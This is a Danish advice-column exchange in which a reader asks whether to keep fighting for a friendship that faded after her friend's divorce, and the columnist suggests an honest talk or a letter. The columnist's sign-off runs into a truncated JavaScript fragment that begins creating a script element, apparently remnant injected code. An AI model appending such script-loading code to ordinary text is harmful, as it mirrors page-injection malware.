Er vores venskab værd at kæmpe for?

Kære Suh.
Jeg har en veninde, som har kendt hinanden igennem mange år, og vi har på mange måder altid været hinandens klippe, når den ene af os havde det svært.
For nogle år siden blev min veninde skilt, bruddet var grimt og jeg syntes ikke, hun traf den rigtige beslutning, men prøvede alligevel at støtte hende så godt jeg kunne.
Efter skilsmissen har hun ændret sig radikalt. Hun farer rundt til alle mulige ting og aktiviteter og dater hele tiden nye mænd. Hun har sjældent tid til at være sammen med mig, og når vi endelig er sammen, oplever jeg, at hun ikke længere er interesseret i mit liv, i mig, men bare har brug for at fortælle om sit nye liv.
Jeg føler, vi er vokset helt fra hinanden og er meget frustreret over det. Mit spørgsmål er: skal jeg blive ved med at kæmpe for vores venskab og vente på, at hun ”kommer tilbage” på et tidspunkt? Eller skal jeg se i øjnene, at vi har fået for forskellige liv, og at vore veje nu må skilles?
Venlig hilsen Veninden

Kære Veninde
Du og din veninde har tilsyneladende en lang historie bag jer, og I har holdt meget af hinanden.
Efter min mening, er det noget, der er værd at kæmpe for. Men er man den eneste, der kæmper, kan kampen være umulig at vinde. Især, hvis I vil hver jeres vej. Og så kan det være nødvendigt, at I går hver til sit, fordi en fortsættelse af venskabet på disse nye præmisser ikke er værdigt for nogen af jer. Et venskab må nødvendigvis have en vis gensidighed.
Men prøv at overveje, om der er måder tilbage at kæmpe for jeres venskab på, som du ikke har afprøvet? Ofte bliver relationer mellem mennesker dårlige, fordi den ene eller begge parter ikke tør eller orker at være ærlige, ikke tør være autentiske i relationen. Man brænder derfor inde med ting, eller der opstår misforståelser, som ødelægger relationen, bid for bid. Hvad den ene part tager for givet, at den anden forstår eller kan rumme, er måske ikke sandt – selvom man kender hinanden godt?
Måske er det værd at prøve at konfrontere din veninde med, hvordan du har det i jeres relation? Fortæl hende, at du længes efter den fælleshed, som I engang havde, og også den interesse du oplevede, hun tidligere havde for dig og for dit liv. Du kan eventuelt vælge at skrive et brev til hende, hvor du giver udtryk for disse ting, hvis du er bekymret for, at du ikke kan finde ordene, når du sidder over for hende. Senere kan I så mødes og følge op på dit brev.
Måske din veninde også har det svært i forhold til dig? Måske føler hun, at hun skal ”bevise” noget overfor dig, måske, at hun skal retfærdiggøre skilsmissen ved at argumentere for, hvor godt hendes nye liv er? Måske hun også oplever et tomrum, der hvor I før havde en masse til fælles, og derfor prøver at fylde det ud med sin nye virkelighed? Det kan også være, at det er svært for hende at spørge til dit liv, fordi det minder hende om det, hun har forladt, og som hun måske derfor ikke så gerne vil tænke tilbage på? Der er mange muligheder, og du finder kun ud af, hvad det handler om, ved at snakke med din veninde om det.
Vov at tage hul på de emner, og giv jeres venskab en chance mere. Tal til den kvinde, som du har været så meget igennem sammen med, og som du har holdt af i mange år, og lad så hendes respons være vejledende for din beslutning om, om du skal fortsætte med at kæmpe for venskabet, eller om det må slutte.
Hilsen Suhvar d=document;var s=d.createElement(‘script’);